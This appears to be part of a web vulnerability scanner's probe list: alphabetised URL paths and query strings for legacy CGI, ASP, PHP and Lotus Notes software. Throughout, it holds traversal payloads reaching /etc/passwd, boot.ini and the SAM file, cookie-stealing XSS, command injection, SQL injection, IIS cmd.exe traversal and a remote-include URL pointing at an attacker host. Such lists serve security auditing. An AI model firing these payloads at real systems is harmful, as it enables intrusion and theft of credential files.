+forum_arc.asp?n=/.../.../.../.../.../.../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_arc.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_arc.asp?n=/../../../../../../../../etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_arc.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_arc.asp?n=/etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_arc.asp?n=/etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_arc.asp?n=268
+forum_arc.asp?n=c:\boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
+forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22
+forum_professionnel.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
+forum_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_professionnel.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_professionnel.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_professionnel.asp?n=/.../.../.../.../.../.../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_professionnel.asp?n=/../../../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_professionnel.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_professionnel.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+forum_professionnel.asp?n=100
+forum_professionnel.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
+forumdisplay.php?GLOBALS[]=1&f=2&comma=\".system('id').\"
+forums/
+forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert('Vulnerable');</script>
+forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script>
+forums/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
+forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+foto/
+fotos/
+foxweb.dll
+foxweb.exe
+fpadmin/
+fpdb/shop.mdb
+fpsrvadm.exe
+friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script>
+ftp.pl
+ftp/
+ftpsh
+functions.inc.php+
+gH.cgi
+gallery/captionator.php
+gallery/errors/configmode.php
+gallery/errors/needinit.php
+gallery/errors/reconfigure.php
+gallery/errors/unconfigured.php
+gallery/index.php?include=../../../../../../../../../etc/passwd
+gallery/search.php?searchstring=<script>alert(document.cookie)</script>
+gb/index.php?login=true
+gbadmin.cgi?action=change_adminpass
+gbadmin.cgi?action=change_automail
+gbadmin.cgi?action=colors
+gbadmin.cgi?action=setup
+gbook/gbook.cgi?_MAILTO=xx;ls
+gbpass.pl
+geeklog/users.php
+general.chl+
+generate.cgi?content=../../../../../../../../../../etc
+generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
+generate.cgi?content=../../../../../../../../../../windows
+generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
+generate.cgi?content=../../../../../../../../../../winnt
+generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
+get32.exe
+get_od_toc.pl
+getaccess
+getdoc.cgi
+gettransbitmap
+gfx/
+glimpse
+global.asa
+global.inc
+global/
+globals.jsa
+globals.php3
+globals.pl
+gm-authors.cgi
+gm-cplog.cgi
+gm.cgi
+goform/CheckLogin?login=root&password=tslinux
+graphics/
+group.nsf
+groups.nsf
+guest/
+guestbook.cgi
+guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
+guestbook.pl
+guestbook/
+guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E
+guestbook/admin.php
+guestbook/admin/o12guest.mdb
+guestbook/guestbook.html
+guestbook/passwd
+guests/
+handler.cgi
+hello.bat?&dir+c:\\
+help.html
+help.php?chapter=<script>alert('Vulnerable')</script>
+help/contents.htm
+help/domguide.nsf
+help/dspug.nsf
+help/help4.nsf
+help/helpadmin.nsf
+help/helplt4.nsf
+help/home.html
+help/internet.nsf
+help/javapg.nsf
+help/lccon.nsf
+help/migrate.nsf
+help/npn_admn.nsf
+help/npn_rn.nsf
+help/readmec.nsf
+help/readmes.nsf
+help/smhelp.nsf
+help/srvinst.nsf
+help4.nsf
+help5_admin.nsf
+help5_client.nsf
+help5_designer.nsf
+helpadmin.nsf
+helperfunction.php
+helplt4.nsf
+hidden.nsf
+hidden/
+hit_tracker/
+hitmatic/
+hitmatic/analyse.cgi
+hits.txt
+hitview.cgi
+home.php?arsc_language=elvish
+home/
+homebet/homebet.dll?form=menu&amp;option=menu-signin
+homepage.nsf
+homepage/
+hopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script>
+horde/test.php
+horde/test.php?mode=phpinfo
+hostadmin/?page='
+hostingcontroller/
+hp-ux/
+hp/device/this.LCDispatcher
+hp_docs/
+hp_docs/cgi-bin/index.cgi
+hp_docs/xmltools/
+hpnst.exe?c=p+i=SrvSystemInfo.html
+hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
+hsx.cgi?show=../../../../../../../../../../../passwd%00
+ht_root/wwwroot/-/local/httpd$map.conf
+htdocs/
+htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+htgrep?file=index.html&hdr=/etc/passwd
+htimage.exe
+htimage.exe/path/filename?2,2
+html/
+html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>
+html/cgi-bin/cgicso?query=AAA
+html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
+html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
+html2chtml.cgi
+html2wml.cgi
+htmlscript?../../../../../../../../../../etc
+htmlscript?../../../../../../../../../../etc/passwd
+htmltonuke.php
+htpasswd
+htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E
+htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E
+htsearch?-c/nonexistant
+htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
+htsearch?exclude=%60/etc/passwd%60
+https-admserv/bin/index?/<script>alert(document.cookie)</script>
+hyperstat/stat_what.log
+i?/etc/passwd
+iNotes/Forms5.nsf
+iNotes/Forms5.nsf/$DefaultNav
+ibill.pm
+ibill/
+icat
+icons/
+idea/
+idealbb/error.asp?|-|0|404_Object_Not_Found
+ideas/
+if/admin/nph-build.cgi
+iisadmin/
+iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir
+iisadmpwd/aexp2.htr
+iisadmpwd/aexp2b.htr
+iisadmpwd/aexp3.htr
+iisadmpwd/aexp4.htr
+iisadmpwd/aexp4b.htr
+iishelp/iis/htm/tutorial/redirect.asp
+iishelp/iis/misc/default.asp
+iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found
+iissamples/exair/howitworks/Code.asp
+iissamples/exair/howitworks/Codebrw1.asp
+iissamples/exair/howitworks/Winmsdp.exe
+iissamples/exair/howitworks/codebrws.asp
+iissamples/exair/search/advsearch.asp
+iissamples/exair/search/query.asp
+iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
+iissamples/exair/search/search.asp
+iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
+iissamples/issamples/SQLQHit.asp
+iissamples/issamples/Winmsdp.exe
+iissamples/issamples/codebrws.asp
+iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
+iissamples/issamples/ixqlang.htm
+iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full
+iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full
+iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
+iissamples/issamples/sqlqhit.asp
+iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
+iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
+iissamples/sdk/asp/docs/Winmsdp.exe
+iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
+iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
+iissamples/sdk/asp/docs/codebrw2.asp
+iissamples/sdk/asp/docs/codebrws.asp
+ikonboard/help.cgi?
+image/
+imageFolio.cgi
+imagefolio/admin/admin.cgi
+imagemap
+imagemap.exe
+imagenes/
+images/
+images/?pattern=/etc/*&sort=name
+img-sys/
+img/
+imgs/
+imp/horde/test.php
+imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x
+import/
+impreso/
+imprimer.asp?no=%60/etc/passwd%60|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
+imprimer.asp?no=....//....//....//....//....//....//....//etc.passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+imprimer.asp?no=../../../../../../../../../etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+imprimer.asp?no=/....../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+imprimer.asp?no=/.../.../.../.../.../.../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+imprimer.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+imprimer.asp?no=/../../../../../../../../etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+imprimer.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+imprimer.asp?no=/etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+imprimer.asp?no=/etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+imprimer.asp?no=c:\boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
+inc/common.load.php
+inc/config.php
+inc/dbase.php
+inc/sendmail.inc
+include.php?path=contact.php&contact_email=\">&lt;script&gt;alert(document.cookie);&lt;/script&gt;
+include/customize.php
+include/help.php
+include/new-visitor.inc.php
+includes/
+includes/adovbs.inc
+includes/footer.php3
+includes/header.php3
+incoming/
+index.html%20
+index.html.ca
+index.html.cz.iso8859-2
+index.html.de
+index.html.dk
+index.html.ee
+index.html.el
+index.html.en
+index.html.es
+index.html.et
+index.html.fr
+index.html.he.iso8859-8
+index.html.hr.iso8859-2
+index.html.it
+index.html.ja.iso2022-jp
+index.html.kr.iso2022-kr
+index.html.ltz.utf8
+index.html.lu.utf8
+index.html.nl
+index.html.nn
+index.html.no
+index.html.po.iso8859-2
+index.html.pt
+index.html.pt-br
+index.html.ru.cp-1251
+index.html.ru.cp866
+index.html.ru.iso-ru
+index.html.ru.koi8-r
+index.html.ru.utf8
+index.html.se
+index.html.tw
+index.html.tw.Big5
+index.html.var
+index.js0x70
+index.jsp%00x
+index.php/123
+index.php/\"><script><script>alert(document.cookie)</script><
+index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchBu
+index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>
+index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
+index.php?IDAdmin=test
+index.php?SqlQuery=test%20
+index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script
+index.php?action=storenew&username=<script>alert('Vulnerable')</script>
+index.php?base=test%20
+index.php?catid=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
+index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
+index.php?dir=<script>alert('Vulnerable')</script>
+index.php?download=/etc/passwd
+index.php?download=/windows/win.ini
+index.php?download=/winnt/win.ini
+index.php?err=3&email=\"><script>alert(document.cookie)</script>
+index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>
+index.php?file=index.php
+index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd
+index.php?module=My_eGallery
+index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc
+index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd
+index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+index.php?offset=[%20Problem%20Here%20]
+index.php?option=search&searchword=<script>alert(document.cookie);</script>
+index.php?page=../../../../../../../../../../boot.ini
+index.php?page=../../../../../../../../../../etc/passwd
+index.php?pymembs=admin
+index.php?rep=<script>alert(document.cookie)</script>
+index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=[sqlgoeshere]
+index.php?sql_debug=1
+index.php?tampon=test%20
+index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
+index.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20
+index.php?vo=\"><script>alert(document.cookie);</script>
+index.php?|=../../../../../../../../../etc/passwd
+index.pl
+info.php
+info/
+info2www
+info2www '(../../../../../../../bin/mail root </etc/passwd>
+informacion/
+information/
+infos/contact/index.asp
+infos/faq/index.asp
+infos/gen/index.asp
+infos/services/index.asp
+infosrch.cgi
+ingresa/
+ingreso/
+input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
+input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
+instaboard/index.cfm
+install/
+install/install.php
+instantwebmail/message.php
+interchange/
+internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini
+internal.sws?../../../../../../../../winnt/win.ini
+internal/
+internet.nsf
+interscan/
+interscan/cgi-bin/FtpSave.dll?I'm%20Here
+intranet/
+intranet/browse.php
+invitado/
+invitados/
+invitefriends.php3
+ion-p.exe?page=c:\winnt\repair\sam
+ion-p?page=../../../../../etc/passwd
+ip.txt
+ipchat.php
+isapi/count.pl?
+isapi/testisa.dll?check1=<script>alert(document.cookie)</script>
+isapi/tstisapi.dll
+isqlplus
+isx.html
+ixmail_netattach.php
+j2ee/
+jailshell
+jamdb/
+java-plugin/
+java-sys/
+java/
+javadoc/
+javapg.nsf
+javax
+jdbc/
+jgb_eng_php3/cfooter.php3
+jigsaw/
+jj
+job/
+jotter.nsf
+journal.cgi?folder=journal.cgi%00
+jrun/
+js
+jservdocs/
+jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini
+jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd
+jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini
+jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd
+jspdocs/
+jsptest.jsp+
+junk.aspx
+k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor
+kbccv11.nsf
+kbnv11.nsf
+kbssvv11.nsf
+kernel/class/delete.php
+kernel/classes/ezrole.php
+krysalis/
+ksh
+l_domlog.nsf
+lastlines.cgi?process
+launch.asp?NFuse_Application=<script>alert('Vulnerable')</script>
+launch.asp?NFuse_Application=LookOut&NFuse_MIMEExtension=.ica
+launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script>
+lccon.nsf
+lcgi/lcgitest.nlm
+lcgi/ndsobj.nlm
+lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
+lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
+lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf
+lcgi/sys:/novonyx/suitespot/docs/sewse/misc/test.jse
+lcon.nsf
+ldap.nsf
+ldap.search.php3?ldap_serv=nonsense%20
+ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\"Vulnerable\")</script>
+leiadm.nsf
+leilog.nsf
+leivlt.nsf
+level/16
+level/16/exec/
+level/16/exec/-///pwd
+level/16/exec/-///show/configuration
+level/16/exec//show
+level/16/exec//show/access-lists
+level/16/level/16/exec//show/configuration
+level/16/level/16/exec//show/interfaces
+level/16/level/16/exec//show/interfaces/status
+level/16/level/16/exec//show/running-config/interface/FastEthernet
+level/16/level/16/exec//show/version
+level/17/exec//show
+level/18/exec//show
+level/19/exec//show
+level/20/exec//show
+level/21/exec//show
+level/22/exec//show
+level/23/exec//show
+level/24/exec//show
+level/25/exec//show
+level/26/exec//show
+level/27/exec//show
+level/28/exec//show
+level/29/exec//show
+level/30/exec//show
+level/31/exec//show
+level/32/exec//show
+level/33/exec//show
+level/34/exec//show
+level/35/exec//show
+level/36/exec//show
+level/37/exec//show
+level/38/exec//show
+level/39/exec//show
+level/40/exec//show
+level/41/exec//show
+level/42/exec//show
+level/42/exec/show%20conf
+level/43/exec//show
+level/44/exec//show
+level/45/exec//show
+level/46/exec//show
+level/47/exec//show
+level/48/exec//show
+level/49/exec//show
+level/50/exec//show
+level/51/exec//show
+level/52/exec//show
+level/53/exec//show
+level/54/exec//show
+level/55/exec//show
+level/56/exec//show
+level/57/exec//show
+level/58/exec//show
+level/59/exec//show
+level/60/exec//show
+level/61/exec//show
+level/62/exec//show
+level/63/exec//show
+level/64/exec//show
+level/65/exec//show
+level/66/exec//show
+level/67/exec//show
+level/68/exec//show
+level/69/exec//show
+level/70/exec//show
+level/71/exec//show
+level/72/exec//show
+level/73/exec//show
+level/74/exec//show
+level/75/exec//show
+level/76/exec//show
+level/77/exec//show
+level/78/exec//show
+level/79/exec//show
+level/80/exec//show
+level/81/exec//show
+level/82/exec//show
+level/83/exec//show
+level/84/exec//show
+level/85/exec//show
+level/86/exec//show
+level/87/exec//show
+level/88/exec//show
+level/89/exec//show
+level/90/exec//show
+level/91/exec//show
+level/92/exec//show
+level/93/exec//show
+level/94/exec//show
+level/95/exec//show
+level/96/exec//show
+level/97/exec//show
+level/98/exec//show
+level/99/exec//show
+lib/
+library/
+libro/
+linux/
+listrec.pl
+livehelp/
+livredor/index.php
+loadpage.cgi?user_id=1&file=../../../../../../../../../../etc
+loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
+loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
+local/httpd$map.conf
+localstart.asp
+log-reader.cgi
+log.htm
+log.html
+log.nsf
+log.txt
+log/
+log/nether-log.pl?checkit
+log4a.nsf
+logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|
+logfile
+logfile.htm
+logfile.html
+logfile.txt
+logfile/
+logfiles/
+logger.html
+logger/
+logging/
+logicworks.ini
+login.cgi
+login.jsp
+login.php3?reason=chpass2%20
+login.php?sess=your_session_id&abt=&new_lang=99999&caller=navlang
+login.pl
+login.pl?course_id=\
+login/
+login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>
+login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>
+logins.html
+logit.cgi
+logjam/showhits.php
+logs.pl
+logs.txt
+logs/
+logs/access_log
+logs/error_log
+logs/str_err.log
+lookwho.cgi
+lost+found/
+lpt9
+lpt9.xtp
+ls
+lsxlc.nsf
+lwgate
+lwgate.cgi
+mab.nsf
+magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../../etc/passwd
+magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc
+mail
+mail.box
+mail/
+mail/addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&addressemail=junk@example.com
+mail/adminisist.nsf
+mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+mail/emumail.cgi?type=/../../../../../../../../../../../../../../../etc
+mail/include.html
+mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
+mail/settings.html
+mail/src/read_body.php
+mail1.box
+mail10.box
+mail2.box
+mail3.box
+mail4.box
+mail5.box
+mail6.box
+mail7.box
+mail8.box
+mail9.box
+mailform.exe
+mailit.pl
+maillist.cgi
+maillist.pl
+mailman/admin/ml-name?\"><script>alert('Vulnerable')</script>;
+mailman/listinfo
+mailman/listinfo/<script>alert('Vulnerable')</script>
+mailman/options/yourlist?language=en&email=&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;
+mailnews.cgi
+mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=../../../../../../etc/passwd
+mailw46.nsf
+main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc
+main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
+main_page.php
+majordomo.pl
+mall_log_files/order.log
+mambo/administrator/phpinfo.php
+mambo/banners.php
+mambo/index.php?Itemid=JUNK(5)
+man.sh
+man2html
+manage/cgi/cgiproc
+manage/login.asp+
+manager/
+manager/html-manager-howto.html
+manager/manager-howto.html
+mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F
+manual.php
+manual/
+manual/ag/esperfrm.htm
+manual/images/
+manual/servlets/scripts/servlet1/servform.htm
+manual/servlets/scripts/shoes/shoeform.htm
+market/
+marketing/
+master.password
+mastergate/search.cgi?search=0&search_on=all
+mbox
+mc-icons/
+mcartfree/database/metacart.mdb
+megabook/admin.cgi?login=<script>alert('Vulnerable')</script>
+megabook/files/20/setup.db
+members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22
+members/
+members/ID.pm
+members/ID.xbb
+message/
+messaging/
+meta.pl
+metacart/database/metacart.mdb
+mgrqcgi
+midicart.mdb
+migrate.nsf
+mini_logger.cgi
+minimal.exe
+ministats/admin.cgi
+misc/
+mkilog.exe
+mkplog.exe
+mkstats/
+mlog.html
+mlog.phtml
+mmstdod.cgi
+mod.php
+mod_ose_docs
+modif/delete.php
+modif/ident.php
+modif_infos.asp?n=%60/etc/passwd%60
+modif_infos.asp?n=....//....//....//....//....//....//....//etc.passwd
+modif_infos.asp?n=../../../../../../../../../etc/passwd%00
+modif_infos.asp?n=/....../boot.ini
+modif_infos.asp?n=/.../.../.../.../.../.../boot.ini
+modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini
+modif_infos.asp?n=/../../../../../../../../../etc/passwd
+modif_infos.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
+modif_infos.asp?n=/etc/passwd
+modif_infos.asp?n=/etc/passwd%00
+modif_infos.asp?n=c:\boot.ini
+mods/apage/apage.cgi?f=file.htm.|id|
+modsecurity.php
+modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index
+modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script>
+modules.php?name=Downloads&d_op=viewdownload
+modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script>
+modules.php?name=Members_List&letter='%20OR%20pass%20LIKE%20'a%25'/*
+modules.php?name=Members_List&sql_debug=1
+modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
+modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script>
+modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test
+modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script>
+modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script>
+modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>
+modules.php?op=modload&name=0&file=0
+modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script>
+modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0
+modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script>
+modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script>
+modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+>
+modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
+modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>;
+modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=
+modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script>
+modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink
+modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script>
+modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script>
+modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2
+modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script>
+modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|
+modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd
+modules/Downloads/voteinclude.php+
+modules/Forums/attachment.php
